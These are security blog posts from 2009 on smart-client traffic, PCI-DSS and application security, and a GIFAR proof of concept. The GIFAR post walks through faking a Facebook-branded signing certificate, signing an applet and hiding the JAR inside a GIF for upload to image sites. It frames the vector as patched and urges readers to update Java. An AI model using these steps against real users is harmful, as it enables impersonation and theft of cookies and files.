3. The http wrapper contains binary application data. This application data is contains class objects.

4. Communication jars downloaded at client side by smart client contains class instance to map these objects.

5. Some smart clients use open SOAP (XML based) in http wrapper for communication.

6. Binary data can be cast in class definition and edited by hex editor.

PCI-DSS and Application security ??

2009-05-18T03:24:00.000-07:00

Most people think PCI-DSS compliance as just firewall-Antivirus-TDE (transparent data encryption).

As it is obvious, it is more of application security and less of network security.

Let’s see what the dirty dozen of PCI-DSS mean from application security perspective:

· Install and maintain firewall, routers & personal firewalls

o Provides no Application Security protection.

· Do not use vendor supplied defaults & harden systems

o Maybe some implementations change passwords, but what about configuration and properties files?

· Protect stored data – encryption & key management

o A transparent encryption standard does not stop any application security attacks.

· Encrypt data sent across public networks – Web & Messaging

o Most implementations forget about secure and http-only session ids, used to compromise systems.

· Use and regularly update anti-virus software

o Updated AV base does not protect from custom zip bombs and stack smashing protection.

· Develop and maintain secure applications – Web & Internal

o Audits do not provide complete security picture of the application.

· Restrict access to data by business need to know

o Again checks on application security front.

· Assign users unique ID’s & enforce password controls

o Backend communication / config does not comply to these controls.

· Restrict physical access, protect & dispose data securely

o Ensure encryption on data and not TDS to secure direct access by application.

· Track & monitor all access to network – Logs, FIM, other

o Usually security threats are kept at debug or low level of logging

· Regularly test security controls – Scans, Pen Tests, IDS

o Most organizations forget to actually fix after a pen test. Budget used not to fix application, but beef-up network

· Maintain information security policies

o PCI compliant websites / companies are regularly hacked.

o The turnaround half-time for fixing security defects remains very high (around 3 weeks to 1 month).

o While most application exploits surface on 0 day to a week after vulnerability is discovered.

GIFAR fixed in jdk6u13 [POC with signed Jars]

2009-05-07T05:54:00.000-07:00

Here's a GIFAR (Applet JARS in hidden in Gif images) proof of concept with signed applets.

For those who do not understand how signed applets work, please update your java to latest version (6u13 as of writing this, which is safe from GIFAR).

Get java latest version from java.com

Also, never accept untrusted java certificates like shown in the above.

What is a signed applet? It is just an applet with RSA certificate to identify the source of the applet. It is also special in sense that it can access system files, commands, network ports etc on client side. While an unsigned applet can just steal your domain specific cookies, signed applets can ftp the whole cookies folder from your machine to an evil site, Or worse, it can download and execute binaries (read keylogger, spambot, virus, backdoors) from the internet.

Since it is very easy to create a fake certificate and cheap to buy a real one from verisign or thawte, it is always a good idea not to accept any certificates. You might also want to remove installed certificates from your java settings.

Now to the fun part (Creating a fake certificate to sign a dangerous applet...Muhahahahah!!!)

It is easy to create and sign applets with fake certificates. Just use the following to create a facebook signature:

$ keytool -genkey -keyalg rsa -alias facebook
Enter keystore password:
What is your first and last name?
[Unknown]: Mark
What is the name of your organizational unit?
[Unknown]: Zuckerberg
What is the name of your organization?
[Unknown]: Facebook, Inc.
What is the name of your City or Locality?
[Unknown]: Dublin
What is the name of your State or Province?
[Unknown]: Ireland
What is the two-letter country code for this unit?
[Unknown]: IR
Is CN=Mark, OU=Zuckerberg, O="Facebook, Inc.", L=Dublin, ST=Ireland, C=IR correct?
[no]: yes

Enter key password for
(RETURN if same as keystore password):

After which you can just generate the certificate:

$ keytool -export -alias facebook -file Facebook2008RSA.cert
Enter keystore password:
Certificate stored in file

Now one can write some applet code to in a java file named helloWorld.java, which can access the system for the cookies directory of the browser (::evil::to steal all secrets). Use the below commands to build, pack, sign and attach to GIF file to create a GIFAR.

$ javac helloworld.java

$ jar cvf helloworld.jar helloworld.class
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: helloworld.class (in=2637) (out=1442) (deflated 45%)
Total:
------
(in = 2681) (out = 1826) (deflated 31%)

$ jarsigner helloworld.jar appsec
Enter Passphrase for keystore:

Warning:
The signer certificate will expire within six months.

$ cat media.gif helloworld.jar > gifar.gif

Now just upload the GIFAR image and the certificate to any site which will can upload images (say blogger or facebook) and call the applet using archive with image URL; The certificate loads from the origin (where GIFAR is kept, like facebook). It also makes it very likely for someone to accept the certificate to create complete PAWNAGE.

Notice that the certificate shows port as 8080, while applet is launched from port 8081. Also it supposedly published by facebook, Inc.

download Image here

This Gifar vector is fixed on JDK6u13. I'd say enough reasons to update. The latest java version breaks when loading GIFARs from internet which is a good thing. But it still does not says that the applet was being read from a GIFAR jar. Also local applet work from Gifar files.

This is a test

2009-05-07T05:52:00.000-07:00

My first security post. I'll try and link this blog to a domain.